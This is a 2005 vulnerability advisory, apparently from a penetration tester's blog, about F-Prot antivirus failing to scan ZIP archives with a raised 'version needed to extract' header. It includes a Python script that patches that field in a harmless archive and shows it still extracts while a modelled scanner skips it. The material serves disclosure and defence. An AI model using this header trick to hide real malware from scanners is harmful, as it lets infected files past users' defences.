F-Prot/Frisk Anti Virus bypass - ZIP Version Header
 
  Ref : TZO-012005-Fprot
  
  
I. Background
http://www.f-prot.com/products/corporate_users/
FRISK Software International has, since it was first established in 1993, consistently maintained its position as one of the world's leading companies in anti-virus research and product development. FRISK Software produces the hugely popular F-Prot Antivirus product range, offering unrivalled neural network and heuristic detection capabilities. In addition to this, the F-Prot AVES managed online e-mail security service filters away the nuisance of spam e-mail as well as viruses, worms and other malware that increasingly clog up inboxes and threaten data security.
  - F-Prot Antivirus for Windows
  - F-Prot Antivirus for Microsoft Exchange
  - F-Prot Antivirus for Linux x86 / BSD x86
  - F-Prot Antivirus for AIX
  - F-Prot Antivirus for DOS
  - F-Prot Antivirus for Solaris SPARC / Solaris x86
II. Description
The F-Prot engine fails to decompress ZIP files whose "version needed to extract" header field is greater than 15. The consequence is that the engine cannot scan the virus/malware inside the archive and flags the file as harmless. When F-Prot is used as an e-mail gateway solution, the offending e-mails slip through.
Local file header (the first bytes of the archive):
  local file header signature   4 bytes  (0x04034b50, i.e. "PK\x03\x04")
  version needed to extract     2 bytes
WinZip, WinRAR and the Microsoft ZIP engine decompress such files fine.
Tested offset:

In this example byte 4 (the byte directly after the 4-byte signature, i.e. the low byte of the "version needed to extract" field) has the version header value 15. F-Prot fails to decompress ZIP files with a version header value greater than 15.
Trivial Solution:
  The ZIP decompression engine should ignore the version field of the
  ZIP file and decompress the file regardless of what the field
  indicates.
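The following Python script is an added example and is not code from the advisory or from FRISK. It builds a small archive in memory (the member content is constructed and harmless), parses the local file header described above, overwrites the 2-byte "version needed to extract" field at offset 4, and then shows that the archive still decompresses when the field is simply ignored, which is the trivial solution the advisory proposes. The `scanner_inspects` function is a model of the behaviour the advisory describes, with the cut-off as a parameter rather than a value taken from F-Prot; note that common tools (Info-ZIP, CPython's zipfile) already write 20 ("2.0") into this field for deflated members, so any threshold has to be read against the hex dump the advisory refers to.

```python
import io
import struct
import zipfile

# Local file header, PKWARE APPNOTE section 4.3.7, all fields little-endian:
#   offset 0  signature (4 bytes, 0x04034b50 = "PK\x03\x04")
#   offset 4  version needed to extract (2 bytes, value / 10 = spec version)
#   offset 6  general purpose flags, 8 method, 10/12 DOS time/date,
#   14 crc32, 18 compressed size, 22 uncompressed size,
#   26 filename length, 28 extra field length, then filename and extra.
LOCAL_HEADER_SIG = 0x04034B50
LOCAL_HEADER_FMT = "<IHHHHHIIIHH"
LOCAL_HEADER_LEN = struct.calcsize(LOCAL_HEADER_FMT)  # 30 bytes
VERSION_OFFSET = 4

# Constructed sample member; stands in for the content a gateway scanner should see.
SAMPLE_NAME = "payload.txt"
SAMPLE_DATA = b"constructed sample content, nothing malicious\n"


def build_zip(name=SAMPLE_NAME, data=SAMPLE_DATA):
    """Return a minimal deflated archive with one member; local header at offset 0."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def parse_local_header(archive):
    """Parse the local file header at the start of the archive into a dict."""
    if len(archive) < LOCAL_HEADER_LEN:
        raise ValueError("too short for a local file header")
    (sig, version, flags, method, mtime, mdate,
     crc, csize, usize, nlen, xlen) = struct.unpack_from(LOCAL_HEADER_FMT, archive, 0)
    if sig != LOCAL_HEADER_SIG:
        raise ValueError("no local file header signature at offset 0: 0x%08x" % sig)
    name = archive[LOCAL_HEADER_LEN:LOCAL_HEADER_LEN + nlen]
    return {
        "version_needed": version,     # e.g. 20 -> "2.0"
        "flags": flags,
        "method": method,              # 8 = deflate, 0 = stored
        "crc32": crc,
        "compressed_size": csize,
        "uncompressed_size": usize,
        "name": name.decode("cp437"),  # ZIP default filename encoding
    }


def version_needed(archive):
    """The 'version needed to extract' value from the local file header."""
    return parse_local_header(archive)["version_needed"]


def set_version_needed(archive, version):
    """Copy of the archive with the local header's version field overwritten.
    Only the local header is patched; the central directory copy stays as written."""
    parse_local_header(archive)  # refuse to patch something that is not a ZIP
    if not 0 <= version <= 0xFFFF:
        raise ValueError("version must fit in 16 bits")
    return (archive[:VERSION_OFFSET]
            + struct.pack("<H", version)
            + archive[VERSION_OFFSET + 2:])


def extract_first(archive):
    """Decompress the first member without consulting the local header's version
    field (the advisory's trivial solution). CPython's zipfile validates only the
    central-directory copy of the field, so the patched local header does not stop it."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.read(zf.namelist()[0])


def scanner_inspects(archive, max_version):
    """Model (an assumption, not F-Prot's code) of the behaviour the advisory
    describes: a scanner that gives up on archives whose local-header version
    exceeds max_version. True means it would decompress and scan the member;
    False means it would skip the archive, which is then reported as harmless."""
    return version_needed(archive) <= max_version


if __name__ == "__main__":
    pristine = build_zip()
    patched = set_version_needed(pristine, 99)  # 99 -> "9.9", no such spec version
    for label, arc in (("pristine", pristine), ("patched", patched)):
        hdr = parse_local_header(arc)
        print("%-8s version=%d (%d.%d) method=%d name=%s scanned=%s extracted=%r"
              % (label, hdr["version_needed"], hdr["version_needed"] // 10,
                 hdr["version_needed"] % 10, hdr["method"], hdr["name"],
                 scanner_inspects(arc, max_version=20), extract_first(arc)))
```

Running the script prints both archives: the patched one carries version 99 in its local header, the modelled scanner skips it, and the member still extracts byte-for-byte. A gateway check that wants to stay on the safe side treats "cannot decompress" as "block or quarantine", never as "clean".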
III. Summary

  Vendor contact  : 30/10/2005
  Vendor response : 01/11/2005
  Vendor response :
          Thank you very much for notifying us of this bug in the current version of
          F-Prot Antivirus. A fix for this bug will be included in future versions
          of F-Prot Antivirus.
  
IV. Download
Wait, what's this?

This is my personal "blog", well, kind of. My name is Thierry Zoller and I am currently working as a Security Engineer and Penetration Tester for "some company" in Luxembourg. On these pages I'll treat everything I enjoy and get in touch with. This may not be strictly related to security but may also touch parts of my personal life.

I am 26 and have been involved in the security field since I was 16. I do sports, fitness and body building, and I hack various things such as cars, electronics...
Disclaimer
The views and opinion expressed herein are my personal views and are not intended to reflect the views of my employer or any other entity.